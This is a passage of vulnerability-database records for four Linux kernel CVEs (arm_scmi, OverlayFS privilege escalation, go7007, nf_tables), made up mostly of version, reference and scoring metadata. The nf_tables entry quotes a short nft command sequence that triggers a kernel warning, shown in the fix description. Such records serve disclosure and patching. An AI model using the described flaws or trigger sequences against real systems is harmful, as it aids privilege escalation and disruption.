],
"providerMetadata": {
"dateUpdated": "2024-06-05T13:55:57.618Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:54.021Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7184491fc515f391afba23d0e9b690caaea72daf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2277d9e2a0d092c13bae7ee82d75432bb8b5108"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f08a1b26cfc53b7715abc46857c6023bb1b87de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e65edf0d37698f7a6cb174608d3ec7976baf49e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9076ffbcaed5da6c182b144ef9f6e24554af268"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0008/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/arm_scmi/reset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7184491fc515f391afba23d0e9b690caaea72daf",
"status": "affected",
"version": "95a15d80aa0de938299acfcbc6aa6f2b16f5d7e5",
"versionType": "git"
},
{
"lessThan": "f2277d9e2a0d092c13bae7ee82d75432bb8b5108",
"status": "affected",
"version": "95a15d80aa0de938299acfcbc6aa6f2b16f5d7e5",
"versionType": "git"
},
{
"lessThan": "1f08a1b26cfc53b7715abc46857c6023bb1b87de",
"status": "affected",
"version": "95a15d80aa0de938299acfcbc6aa6f2b16f5d7e5",
"versionType": "git"
},
{
"lessThan": "8e65edf0d37698f7a6cb174608d3ec7976baf49e",
"status": "affected",
"version": "95a15d80aa0de938299acfcbc6aa6f2b16f5d7e5",
"versionType": "git"
},
{
"lessThan": "e9076ffbcaed5da6c182b144ef9f6e24554af268",
"status": "affected",
"version": "95a15d80aa0de938299acfcbc6aa6f2b16f5d7e5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/arm_scmi/reset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.277",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.218",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.71",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.19.*",
"status": "unaffected",
"version": "5.19.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.0",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.277",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.218",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.71",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.19.12",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.0",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: arm_scmi: Harden accesses to the reset domains\n\nAccessing reset domains descriptors by the index upon the SCMI drivers\nrequests through the SCMI reset operations interface can potentially\nlead to out-of-bound violations if the SCMI driver misbehave.\n\nAdd an internal consistency check before any such domains descriptors\naccesses."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:20:40.297Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7184491fc515f391afba23d0e9b690caaea72daf"
},
{
"url": "https://git.kernel.org/stable/c/f2277d9e2a0d092c13bae7ee82d75432bb8b5108"
},
{
"url": "https://git.kernel.org/stable/c/1f08a1b26cfc53b7715abc46857c6023bb1b87de"
},
{
"url": "https://git.kernel.org/stable/c/8e65edf0d37698f7a6cb174608d3ec7976baf49e"
},
{
"url": "https://git.kernel.org/stable/c/e9076ffbcaed5da6c182b144ef9f6e24554af268"
}
],
"title": "firmware: arm_scmi: Harden accesses to the reset domains",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48655",
"datePublished": "2024-04-28T13:01:00.822Z",
"dateReserved": "2024-02-25T13:44:28.317Z",
"dateUpdated": "2025-05-04T08:20:40.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-0386 (GCVE-0-2023-0386)
Vulnerability from cvelistv5
Published
2023-03-22 00:00
Modified
2025-10-21 23:15
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T05:10:55.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4f11ada10d0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230420-0004/"
},
{
"name": "DSA-5402",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5402"
},
{
"name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-0386",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-17T03:55:31.499341Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-06-17",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-0386"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T23:15:22.744Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-0386"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-06-17T00:00:00+00:00",
"value": "CVE-2023-0386 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux kernel 6.2-rc6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel\u2019s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-282",
"description": "CWE-282",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:11:02.905Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4f11ada10d0a"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230420-0004/"
},
{
"name": "DSA-5402",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5402"
},
{
"name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html"
},
{
"url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-0386",
"datePublished": "2023-03-22T00:00:00.000Z",
"dateReserved": "2023-01-18T00:00:00.000Z",
"dateUpdated": "2025-10-21T23:15:22.744Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27074 (GCVE-0-2024-27074)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: go7007: fix a memleak in go7007_load_encoder
In go7007_load_encoder, bounce(i.e. go->boot_fw), is allocated without
a deallocation thereafter. After the following call chain:
saa7134_go7007_init
|-> go7007_boot_encoder
|-> go7007_load_encoder
|-> kfree(go)
go is freed and thus bounce is leaked.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 Version: 95ef39403f890360a3e48fe550d8e8e5d088ad74 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27074",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-09T18:38:34.857728Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:45.741Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:59.415Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f11dd3d165b178e738fe73dfeea513e383bedb5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/291cda0b805fc0d6e90d201710311630c8667159"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b49fe84c6cefcc1c2336d793b53442e716c95073"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/790fa2c04dfb9f095ec372bf17909424d6e864b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e04d15c8bb3e111dd69f98894acd92d63e87aac3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f31c1cc37411f5f7bcb266133f9a7e1b4bdf2975"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d43988a23c32588ccd0c74219637afb96cd78661"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7405a0d4442792988e9ae834e7d84f9d163731a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9b683844b01d171a72b9c0419a2d760d946ee12"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/go7007/go7007-driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7f11dd3d165b178e738fe73dfeea513e383bedb5",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "291cda0b805fc0d6e90d201710311630c8667159",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "b49fe84c6cefcc1c2336d793b53442e716c95073",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "790fa2c04dfb9f095ec372bf17909424d6e864b3",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "e04d15c8bb3e111dd69f98894acd92d63e87aac3",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "f31c1cc37411f5f7bcb266133f9a7e1b4bdf2975",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "d43988a23c32588ccd0c74219637afb96cd78661",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "7405a0d4442792988e9ae834e7d84f9d163731a4",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
},
{
"lessThan": "b9b683844b01d171a72b9c0419a2d760d946ee12",
"status": "affected",
"version": "95ef39403f890360a3e48fe550d8e8e5d088ad74",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/go7007/go7007-driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.10"
},
{
"lessThan": "3.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: go7007: fix a memleak in go7007_load_encoder\n\nIn go7007_load_encoder, bounce(i.e. go-\u003eboot_fw), is allocated without\na deallocation thereafter. After the following call chain:\n\nsaa7134_go7007_init\n |-\u003e go7007_boot_encoder\n |-\u003e go7007_load_encoder\n |-\u003e kfree(go)\n\ngo is freed and thus bounce is leaked."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:39.767Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7f11dd3d165b178e738fe73dfeea513e383bedb5"
},
{
"url": "https://git.kernel.org/stable/c/291cda0b805fc0d6e90d201710311630c8667159"
},
{
"url": "https://git.kernel.org/stable/c/b49fe84c6cefcc1c2336d793b53442e716c95073"
},
{
"url": "https://git.kernel.org/stable/c/790fa2c04dfb9f095ec372bf17909424d6e864b3"
},
{
"url": "https://git.kernel.org/stable/c/e04d15c8bb3e111dd69f98894acd92d63e87aac3"
},
{
"url": "https://git.kernel.org/stable/c/f31c1cc37411f5f7bcb266133f9a7e1b4bdf2975"
},
{
"url": "https://git.kernel.org/stable/c/d43988a23c32588ccd0c74219637afb96cd78661"
},
{
"url": "https://git.kernel.org/stable/c/7405a0d4442792988e9ae834e7d84f9d163731a4"
},
{
"url": "https://git.kernel.org/stable/c/b9b683844b01d171a72b9c0419a2d760d946ee12"
}
],
"title": "media: go7007: fix a memleak in go7007_load_encoder",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27074",
"datePublished": "2024-05-01T13:04:41.079Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T09:03:39.767Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35900 (GCVE-0-2024-35900)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: reject new basechain after table flag update
When dormant flag is toggled, hooks are disabled in the commit phase by
iterating over current chains in table (existing and new).
The following configuration allows for an inconsistent state:
add table x
add chain x y { type filter hook input priority 0; }
add table x { flags dormant; }
add chain x w { type filter hook input priority 1; }
which triggers the following warning when trying to unregister chain w
which is already unregistered.
[ 127.322252] WARNING: CPU: 7 PID: 1211 at net/netfilter/core.c:50 1 __nf_unregister_net_hook+0x21a/0x260
[...]
[ 127.322519] Call Trace:
[ 127.322521] <TASK>
[ 127.322524] ? __warn+0x9f/0x1a0
[ 127.322531] ? __nf_unregister_net_hook+0x21a/0x260
[ 127.322537] ? report_bug+0x1b1/0x1e0
[ 127.322545] ? handle_bug+0x3c/0x70
[ 127.322552] ? exc_invalid_op+0x17/0x40
[ 127.322556] ? asm_exc_invalid_op+0x1a/0x20
[ 127.322563] ? kasan_save_free_info+0x3b/0x60
[ 127.322570] ? __nf_unregister_net_hook+0x6a/0x260
[ 127.322577] ? __nf_unregister_net_hook+0x21a/0x260
[ 127.322583] ? __nf_unregister_net_hook+0x6a/0x260
[ 127.322590] ? __nf_tables_unregister_hook+0x8a/0xe0 [nf_tables]
[ 127.322655] nft_table_disable+0x75/0xf0 [nf_tables]
[ 127.322717] nf_tables_commit+0x2571/0x2620 [nf_tables]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.034Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d12f21f8bbe23fde25b77c2bf5973c136b8bef8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41bad13c0e8a5a2b47a7472cced922555372daab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b6fba6918714afee3e17796113ccab636255c7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ba81dca416adf82fc5a2a23abc1a8cc02ad32fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/745cf6a843896cdac8766c74379300ed73c78830"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/420132bee3d0136b7fba253a597b098fe15493a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e95bb4cba94c018be24b11f017d1c55dd6cda31a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/994209ddf4f430946f6247616b2e33d179243769"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35900",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:41:08.192403Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:16.096Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6d12f21f8bbe23fde25b77c2bf5973c136b8bef8",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "41bad13c0e8a5a2b47a7472cced922555372daab",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "7b6fba6918714afee3e17796113ccab636255c7b",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "8ba81dca416adf82fc5a2a23abc1a8cc02ad32fb",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "745cf6a843896cdac8766c74379300ed73c78830",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "420132bee3d0136b7fba253a597b098fe15493a7",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "e95bb4cba94c018be24b11f017d1c55dd6cda31a",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "994209ddf4f430946f6247616b2e33d179243769",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
